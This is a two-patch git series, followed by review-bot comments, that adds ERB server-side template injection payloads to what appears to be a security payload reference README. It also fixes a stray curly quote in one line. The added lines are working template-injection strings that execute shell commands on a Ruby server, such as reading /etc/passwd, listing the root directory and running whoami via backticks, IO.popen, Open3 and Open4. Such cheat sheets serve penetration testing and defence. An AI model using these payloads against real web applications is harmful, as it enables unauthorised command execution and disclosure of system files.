From 7670e2c36cd68663318aa2a7fd069e680f97097f Mon Sep 17 00:00:00 2001 From: meizjm3i Date: Fri, 29 May 2020 12:28:55 +0800 Subject: [PATCH 1/2] Update ERB SSTI tips --- Server Side Template Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 687a319..7c9956c 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine. ```ruby <%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` + + Execute code using SSTI for Slim engine. ```powershell From a987b8be9faa800085c73d4b843c6b1405cd045a Mon Sep 17 00:00:00 2001 From: meizjm3i Date: Fri, 29 May 2020 18:35:22 +0800 Subject: [PATCH 2/2] corrected a single quotation mark closure error --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 7c9956c..eb78c9d 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -97,7 +97,7 @@ Execute code using SSTI for ERB engine. <%= system('cat /etc/passwd') %> <%= `ls /` %> <%= IO.popen('ls /').readlines() %> -<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ```
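Review bot: In patch 1/2, the added Open3 line opens its string with a straight quote and closes it with a typographic one (`require 'open3’`), so the literal never terminates and the line will not parse as Ruby when copied from the README. Change it to `require 'open3'` in this commit. The hunk also adds two blank lines after the closing code fence where the file previously had one separator; drop the extra one so the spacing before "Execute code using SSTI for Slim engine." matches the rest of the README.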
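Review bot: Patch 2/2 only replaces the closing quote on the `require 'open3’` line that patch 1/2 of the same series introduced, so it should be squashed into 1/2. That way the README never exists in history with the unparseable line. While touching this block, add a one-line note explaining why the Open3 line reads `@b.readline()` but the Open4 line reads `@c.readline()`. The two lines are otherwise identical, and a reader cannot tell from the README whether the differing index is intentional or a typo.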